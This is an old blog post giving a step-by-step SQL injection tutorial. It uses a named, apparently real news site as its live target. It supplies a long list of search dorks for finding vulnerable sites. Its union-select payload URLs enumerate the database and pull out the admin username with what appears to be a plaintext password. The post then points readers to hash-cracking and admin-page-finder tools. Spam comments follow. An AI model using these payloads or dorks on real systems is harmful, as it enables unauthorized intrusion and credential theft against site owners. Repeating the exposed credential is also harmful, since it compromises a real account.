Monday 13 September 2010

SQL Injection Step By Step

-------------------------------------------------------
o. Finding a victim:
-------------------------------------------------------


In order to find vulnerable sites you can use the following search dorks. This is a list of dorks you can use to find potentially vulnerable sites.
But to make the tutorial easier to follow we will use the page
http://www.rfidupdate.com/articles/index.php?id=-15634.

Code:-

inurl:aboutbook.php?id=
inurl:age.php?file=
inurl:age.php?id=
inurl:ageid=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:art.php?idm=
inurl:articipant.php?id=
inurl:article.php?ID=
inurl:artikelinfo.php?id=
inurl:avd_start.php?avd=
inurl:band_info.php?id=
inurl:buy.php?category=
inurl:category.php?id=
inurl:channel_id=
inurl:chappies.php?id=
inurl:clanek.php4?id=
inurl:clubpage.php?id=
inurl:collectionitem.php?id=
inurl:communique_detail.php?id=
inurl:curriculum.php?id=
inurl:declaration_more.php?decl_id=
inurl:detail.php?ID=
inurl:download.php?id=
inurl:downloads_info.php?id=
inurl:erson.php?id=
inurl:event.php?id=
inurl:faq2.php?id=
inurl:fellows.php?id=
inurl:ffer.php?idf=
inurl:fiche_spectacle.php?id=
inurl:forum_bds.php?num=
inurl:galeri_info.php?l=
inurl:gallery.php?id=
inurl:game.php?id=
inurl:games.php?id=
inurl:historialeer.php?num=
inurl:hosting_info.php?id=
inurl:humor.php?id=
inurl:index.php?=
inurl:index.php?id=
inurl:index2.php?option=
inurl:iniziativa.php?in=
inurl:item_id=
inurl:kategorie.php4?id=
inurl:labels.php?id=
inurl:lay_old.php?id=
inurl:loadpsb.php?id=
inurl:look.php?ID=
inurl:main.php?id=
inurl:material.php?id=
inurl:memberInfo.php?id=
inurl:news.php?id=
inurl:news_display.php?getid=
inurl:news_view.php?id=
inurl:newscat.php?id=
inurl:newsDetail.php?id=
inurl:news-full.php?id=
inurl:newsid=
inurl:newsitem.php?num=
inurl:newsone.php?id=
inurl:newsticker_info.php?idn=
inurl:offer.php?idf=
inurl:op.php?id=
inurl:opinions.php?id=
inurl:ost.php?id=
inurl:page.php?file=
inurl:page.php?id=
inurl:Pageid=
inurl:pages.php?id=
inurl:participant.php?id=
inurl:person.php?id=
inurl:pinions.php?id=
inurl:play_old.php?id=
inurl:pop.php?id=
inurl:post.php?id=
inurl:preview.php?id=
inurl:prod_detail.php?id=
inurl:prod_info.php?id=
inurl:product.php?id=
inurl:product_ranges_view.php?ID=
inurl:productdetail.php?id=
inurl:productinfo.php?id=
inurl:product-item.php?id=
inurl:produit.php?id=
inurl:profile_view.php?id=
inurl:publications.php?id=
inurl:ray.php?id=
inurl:read.php?id=
inurl:readnews.php?id=
inurl:reagir.php?num=
inurl:releases.php?id=
inurl:review.php?id=
inurl:rod_info.php?id=
inurl:roduct.php?id=
inurl:roduct_ranges_view.php?ID=
inurl:roductdetail.php?id=
inurl:roductinfo.php?id=
inurl:roduct-item.php?id=
inurl:roduit.php?id=
inurl:rofile_view.php?id=
inurl:rub.php?idr=
inurl:rubp.php?idr=
inurl:rubrika.php?idr=
inurl:section.php?id=
inurl:select_biblio.php?id=
inurl:sem.php3?id=
inurl:shop.php?do=part&id=
inurl:shop_category.php?id=
inurl:shopping.php?id=
inurl:show.php?id=
inurl:show_an.php?id=
inurl:showimg.php?id=
inurl:shredder-categories.php?id=
inurl:spr.php?id=
inurl:sql.php?id=
inurl:staff_id=
inurl:story.php?id=
inurl:sw_comment.php?id=
inurl:tekst.php?idt=
inurl:theme.php?id=
inurl:title.php?id=
inurl:top10.php?cat=
inurl:tradeCategory.php?id=
inurl:trainers.php?id=
inurl:transcript.php?id=
inurl:tray-Questions-View.php?num=
inurl:ublications.php?id=
inurl:view.php?id=
inurl:view_faq.php?id=
inurl:view_product.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:viewshowdetail.php?id=
inurl:website.php?id=
inurlrod_detail.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
For a longer dork list you can download this file.

This is a huge dorklist that i compiled by using

http://www.filefront.com/14257397/DorksForSQLi.txt/

(2000+ google dorks for SQLi)
-------------------------------------------------------
1. Checking if the site is vulnerable to SQL Injection
-------------------------------------------------------

Now you add a ' to the url. Lets say our target page is

http://www.rfidupdate.com/articles/index.php?id=-15634


than you try

http://www.rfidupdate.com/articles/index.php?id=-15634'

If nothing happens and the page just loads up normal, than the site is not vulnerable to this method.
But if an error appears, then it is vulnerable to our method.
The error should look like this.

Code:
Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 10
-------------------------------------------------------
2. Finding the number of columns
-------------------------------------------------------
To finde the number of columns, we add "order by x" to the original site url and start for example on x = 1 and increment the x by one
or if you like with bigger stepps.

Code:
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 1 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 2 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 3 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 4 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 5 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 6 ==> No error
.
.
.
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 15 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 16 ==> Error

This reveals that there are 15 columns, cause "order by 16" was followed by an error.
-------------------------------------------------------
3. Which colume is vulnerable
-------------------------------------------------------
With order by we found that there are a total of 15 columns. We now use the
"union all select" command + all the columns seperated by a "," + "--"

For our example we get ...
Code:
http://www.rfidupdate.com/articles/index.php?id=-1563 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --

We get 3 and 7 as vulnarable columnes.


-------------------------------------------------------
4. Finding the SQL version from this site
-------------------------------------------------------
For this purpose we choose one from our vulnerable columns and replace it with "@@version", in order to
get the SQL version.


Code:
http://www.rfidupdate.com/articles/index.php?id=-1563 union all select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15

We could have also replaced "7" with "@@version". And we will now see the site but now the Colume which we replaced by
"@@version" is now replaced by the SQL version "5.0.67-community".
If the version would be 4 or less you would have to follow another tutorial :(
-------------------------------------------------------
5. Finding the SQL table names
-------------------------------------------------------
In order to find the table names we replace "@@version" with "group_concat(table_name)" and we add
"from information_schema.tables where table_schema=database()--" to the end of the url.

You should have this:

Code:

http://www.rfidupdate.com/articles/index.php?id=-1563 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()--

[Code]



The page now displays the talbes
[Code]


ru_Admin,ru_AdvertisementCategories,ru_AdvertisementCategoriesOwners,ru_AdvertisementCategoriesOwnersHistory,
ru_AdvertisementChannels,ru_AdvertisementChannelsHistory,ru_AdvertisementListings,ru_AdvertisementListingsHistory,
ru_AdvertisementPremiums,ru_AdvertisementPremiumsHistory,ru_AdvertisingRequests,ru_AntiSpamQuestions,ru_ArticleCategor

The most interesting here is "ru_Admin", because this seems to be the administrator.
-------------------------------------------------------
5. Finding two other columnes(Username and Password)
-------------------------------------------------------
Now we are going to find the columns which are important for finding the admin password.
We have to change "group_concat(table_name)" to "group_concat(column_name)" and
"from information_schema.tables where table_schema=database()--" to
"from information_schema.column where table_schema=database()--"

We get the following:

Code:
http://www.rfidupdate.com/articles/index.php?id=-1563 union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database()--


The Site loads some new tables again, but we are only interested in the first two columns cause they contain
username and password from admin.

Code:


ru_Admin_Username,ru_Admin_Password,ru_AdvertisementCategories_ID,ru_AdvertisementCategories_Name,
ru_AdvertisementCategories_Enabled,ru_AdvertisementCategories_Priority,ru_AdvertisementCategoriesOwners_ID,
ru_AdvertisementCategoriesOwners_Enabled,ru_AdvertisementCategoriesOwners_Created,
ru_AdvertisementCategoriesOwners_LastUpdated,ru_Advert
-------------------------------------------------------
6. Finding admin username and password
-------------------------------------------------------
In order to get the username and the password we again change the URL.
1. "group_concat(columns_name)" to "group_concat(ru_Admin_Username,0x3a,ru_Admin_Password)"
2. "from information_schema.columns where table_schema=database()--" to "from ru_Admin--"

So our Url looks like this(Important: When pasting the URL you browser may add some crap in front of the 13, which should be deleted in order to get the URL working^^):

Code:

http://www.rfidupdate.com/articles/index.php?id=-1563 union all select 1,2,group_concat(ru_Admin_Username,0x3a,ru_Admin_Password),4,5,6,7,8,9,10,11,12, 13,14,15 from ru_Admin--

Look what we get ...
Code:
admin:admRIvuxHahkQ

As you might guess "admin" is the username and "admRIvuxHahkQ" the related password. What we now have to do is to
find the admin login page.

In this example the password was not crypted.
But i want also to explain what you can do if the password is crypted.
-------------------------------------------------------
7. Cracking MD5
-------------------------------------------------------
If the admin was lazy and he used some very easy to crack password, than you might have success with the following
online crack engines:

* http://hashkiller.com/
* http://www.md5this.com/crack-it-/index.php
* http://gdataonline.com/seekhash.php
* http://www.milw0rm.com/cracker/insert.php

For webcracking a Hash, i would advise you to use hashkiller.com as it will use many webcracker to decrypt your Hash.
But you will have to register onto that page. In case you are using Firefox you can also get a cool addon called Bugmenot, just follow the link in my signature for more detail and other helpful addons.

If the admin was not lazy and used a very uncommon password you can use the following applications to bruteforce the hash.


* Cain and Abel--
http://www.oxid.it/cain.html

* MDCrack NG
http://c3rb3r.openwall.net/mdcrack/

here is the good video tutorial -
http://infinityexists.com/videos/episode10/

for the usage of both applications.
WARING: I didn't upload the files and i do not take any responsiblity for them.

-------------------------------------------------------
8. Finding admin login page
-------------------------------------------------------
There are some sites that provide a search engine for admin login pages

http://www.th3-0utl4ws.com/tools/admin-finder/http://mormoroth.net/af/http://4dm1n.houbysoft.com/

And you can also download a program called Admin Page Finder, which is very useful on finding the admin login page.
http://zarabyte.com/dl/adminfinder.rar
WARING: I didn't upload the files and i do not take any responsiblity for them.



Please do not try to deface the site as this would prevent other people to have the chance to follow the tutorial like you did

-----------------------------

firefox addons-
http://www.facebook.com/topic.php?uid=116329035053162&topic=429


enjoy !!!

keep.. rocking ..

team -
WOH ....

3 comments:

Unknown said...

Welcome to our website www.shalimardesigns.com
Free delivery of fresh flowers and custom floral arrangements for the greater Brampton area: Brampton Florist, locally owned flower shop in Brampton, Ontario.Our service are available Florist in, Brampton, Ontario, L6W 2B5, Flower, Brampton Florist, find a, retail, shopping, delivery, sympathy, online, funeral, shop, send, rose, gift, valentine, anniversary, wedding, mothers day, delivery, prom, corsage, bouquet, boutonniere, spray, Medical Center...

Unknown said...

Welcome to our website www.shalimardesigns.com
Free delivery of fresh flowers and custom floral arrangements for the greater Brampton area: Brampton Florist, locally owned flower shop in Brampton, Ontario.Our service are available Florist in, Brampton, Ontario, L6W 2B5, Flower, Brampton Florist, find a, retail, shopping, delivery, sympathy, online, funeral, shop, send, rose, gift, valentine, anniversary, wedding, mothers day, delivery, prom, corsage, bouquet, boutonniere, spray, Medical Center...

Newzpot said...

http://www.newspatrolling.com and http://www.bigshoptree.com

Post a Comment

Related Posts Plugin for WordPress, Blogger...
Twitter Delicious Facebook Digg Stumbleupon Favorites More